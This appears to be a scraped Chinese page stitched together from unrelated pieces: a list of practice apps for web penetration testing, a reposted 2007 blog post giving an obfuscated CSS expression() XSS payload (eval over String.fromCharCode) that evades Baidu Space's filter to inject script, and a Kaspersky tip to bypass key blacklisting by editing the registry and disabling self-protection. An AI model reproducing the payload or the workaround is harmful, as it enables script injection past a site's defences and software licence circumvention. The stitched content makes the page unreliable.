本文目录一览:
有哪些好用的渗透测试演练系统
1、DVWA (Dam Vulnerable Web Application)
是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
2、mutillidae
是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Irongeek” Crenshaw和Jeremy “webpwnized” Druin。开发的一款自由和开放源码的Web应用程序。其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等。
3、SQLol
是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句。此程序在Austin黑客会议上由Spider Labs发布。
4、hackxor
是由albino开发的一个online黑客游戏,亦可以下载安装完整版进行部署,包括常见的WEB漏洞演练。包含常见的漏洞XSS、CSRF、SQL注入、RCE等。
5、BodgeIt
是一个Java编写的脆弱性WEB程序。他包含了XSS、SQL注入、调试代码、CSRF、不安全的对
象应用以及程序逻辑上面的一些问题。
百度空间插入视频 ***
百度空间插入视频的 *** ~~~2007年01月19日 星期五 下午 01:31转自年1月7日
想在百度空间插入视频么?
在你的css里加入如下代码即可!可以加在任何地方(不过,更好放在最前头)!本代码对IE5.0+~~~~IE7有效!
body{xss:expr/*XSS*/ession(eval(String.fromCharCode(118,97,114,32,105,44,106,44,120,44,121,44,122,59,106,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,59,102,111,114,40,105,61,48,59,105,60,106,46,108,101,110,103,116,104,59,105,43,43,41,123,121,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,59,122,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,59,120,61,39,60,98,114,47,62,60,101,109,98,101,100,32,115,114,99,61,39,43,122,43,39,32,97,117,116,111,112,108,97,121,61,49,32,119,105,100,116,104,61,52,53,48,32,104,101,105,103,104,116,61,51,53,48,62,60,47,101,109,98,101,100,62,60,98,114,47,62,60,97,32,104,114,101,102,61,104,116,116,112,58,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,47,98,108,111,103,47,105,116,101,109,47,51,50,56,56,51,55,102,97,57,98,51,99,102,51,56,57,57,102,53,49,52,54,101,53,46,104,116,109,108,32,116,97,114,103,101,116,61,95,98,108,97,110,107,62,73,78,83,69,82,84,32,86,73,68,69,79,32,73,78,32,89,79,85,82,32,66,65,73,68,85,32,83,80,65,67,69,32,63,60,47,97,62,60,98,114,47,62,39,59,105,102,40,121,41,32,121,46,111,117,116,101,114,72,84,77,76,61,120,59,125)));}
INSERT VIDEO IN YOUR BAIDU SPACE ?
这回的速度绝对是有史以来更高的了!基本上没有任何的页面加载影响!感谢Monyer吧,为此已经奋战一宿了!
说说我的漏洞发现经过吧!
我在两点时要睡觉了,睡到三点还没有睡着,只是恍恍惚惚!突然间一个灵感出现了,于是我拖着疲惫的身体爬了起来!一直到现在终于完成了,现在是六点半,我做了一宿哦!呵呵!今天还有课呢!
视频插入 *** :输入你要插入的网址,然后加斜体即可!注意不要让系统自动加上链接,否则可能会失效哦!
大家注意:加完代码后,别老乱改你的css,说不定哪天百度心血来潮就又给屏蔽了!那也枉费了Monyer的一番苦心啊!
另外既然斜体已经被视频占用了,你平时输入文字什么的就不要加斜体了,否则后果嘛?就是你的文字消失,取而代之的是一个没有任何内容的视频框框
天!现在还晕乎乎的,看来睡跟没睡都差不多,像做梦似的!
另外本文有版权哦!但可以随意转载!
MONYER后添加于——2007年1月7日
另外你可能看到插入的视频下面有一个“insert vedio in your baidu space ?”的类似于广告的东西。这个你愿意说它是广告也好,说它不是也罢!这里声明一点,这个不是为了宣传我自己,是为了宣传怎样插视频。
我公布的百度漏洞能有十来个了吧(★Monyer的XSS系列)!每一个百度都会在很快的时间内屏蔽掉!这个也不例外!而且我空间的人气不是很高,所以不能保证每个人在漏洞有效时都知道百度能插入视频了,所以作出这样一个无奈的办法,望谅解!
有人说代码加密了,其实这个加密是为了躲过百度的过滤,而不是不让你们看。我是玩黑客的,若是真不想让你们看到,你认为你能看到么?当然如果你们想看,我已经给了解密代码js加密解密,你想怎么改就怎么改吧!把那个类似广告的东西去掉也可以——不过我想说的是:既然我都可以把代码公布给你们,那么其实你们互相宣传一下也不是什么错误!难道你不是从这个小链接进来的么?如果你不是,那么你可以大胆地删掉!但另外那些删除的人没有一种卸磨杀驴的感觉么?其实当不当驴无所谓,人的秉性而已,我无法更改,我也不抱怨什么!或许下次我再发布些好东西,你们将会一无所知。但是你们不要怨我,怨就怨那些吃骨头不吐骨头的人吧!
可能你感觉我这么说有些犀利,但是请你看看某些人的评论(有些可能删除了,因为我是在看不下去了),你就知道我为什么这么气愤了。首先不说我做了什么好事,我没有做坏事是吧?那为什么要骂我?其实发现新 *** 后,我利用是很容易的,而且说实话,我也并不经常需要插视频;可是还为了你们都能简单的用上,我硬是花了一晚上时间优化代码,为了是你们用起来方便(可能有些人会认为代码很简单,跟在桌面上立鸡蛋只需要在桌面上磕一下差不多,但是这正是我优化后的结果)。结果怎样?好心没好报,骂我还要连我们家人都带上。
说实话,曾经入侵那些服务器时,我都没怕过。但我现在却有些害怕,我不知道下一次我是否还会有勇气把这些东西共享给你们,每天我会把博客登录几次,不是为了看你们的感激,而是看我的善意的做法又会激起多少人的愤怒!然后我会小心翼翼的把那些侮辱的言辞删掉并感叹中国语言的博大精深,因为我怕会有人因此误解我!众口铄金啊!
最近本准备公布一下百度文章备份软件来着,很早就写完了,一直没敢放上来。上次也是因为什么事来着!但思前想后决定还是算了吧!还是自己留着用吧,我既然生活的很好,何必还去自找麻烦呢!每一次我公布些什么就总有人对我不满,并写各种的词汇似乎我比什么流氓 *** 还不是东西,我每一次都会受伤一次。现在已经怕了,我是小人物,我只想和大家和睦相处,所以我会害怕,所以我会躲起来!
呵呵,具体的一些内部,你去看我那天和他们的唇枪舌战吧!不过可惜的是我把他们的评论都删了,仅留了我们部分的! 因为那天他们不仅侮辱了我,更重要的是还侮辱了我的朋友!尤其是girlqiqi 被骂得好惨,我都看不下去了,急忙删掉了。另外感谢那天和我站在同一战线上为我辩解的朋友,他们是girlqiqi qyg19 52abc 等好友,没有他们为我开脱,我那天真有口难辨了!Monyer再次对他们的帮助说声谢谢!他们都是值得交的朋友!
到以下网站找视频!
1234520 15150 155 163888 17173 17club 1Ting 1Zart 21GT 516 51TV 56
5Show 5T 6Rooms 91VC 9You Acrr AdultTube BaLa BeBo Beedeo Blip
Bokecc BoLaa ClipFish ClipMeNow CNBoo CollegeHumor CurrentTV DailyMotion
Damoim Daum Dian6 DumpALink DuoWan DuSee eBaumsWorld EinHand EyeSpot
FeeSee FKee FLURL FreeChal FreeOnlineGames FriendEarth GameKlip GameTrailers
Glumbert Google GPrime GuBa Heavy iAsk JumpCut KuBao iFilm inBoKe LuLu
Magify MaiDee MaxDuo MetaCafe MNCast MobuzzTV MoCasting MoCoVideo mofile Mop
MoViZo MyVideo NiPai OuOu OpenV oYoo PaPaV PodLook PornoTube PubPop QiHoo
QiKoo QiRSS Qooqle QuXiu SeeHaHa SeGoo SetMov Sharkle Show5 SoKiKi SouV
TuDou TVix UUMe Veoh Vidiac VidiLife VideoJug VideoRonk Vimeo Vlog Vottie vSocial
WangYou WatchMe WoAiDe XMYan YiJian YoQoo YouTube
另另外:你更好把视频放在文章后面,不在首页显示出来,这样就不会有所有歌什么的一起响的痛苦!而且可以减轻客户端加载视频的负担(加载10个是要比加载一个浪费很多资源的)
kaspersky key is blacklisted不能升级了
06年12月5日,卡巴大范围封杀了许多使用了较长时间的非正常渠道key,导致大量卡巴用户无法更新,提示key进入黑名单。
对于一个正常的商业公司来说,这个行动是可以理解的。
如果你的是 kav的话 ,你就用360安全卫士的激活码
可以用半年,可以免费申请
要是你的是kis 的话 还是用360安全卫士的激活码
想用激活码的话把注册表里HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\AVP6\environment 里的ProductType项的KIS改成KAV的话可以使用
记住 把 自我保护 的 勾 给打掉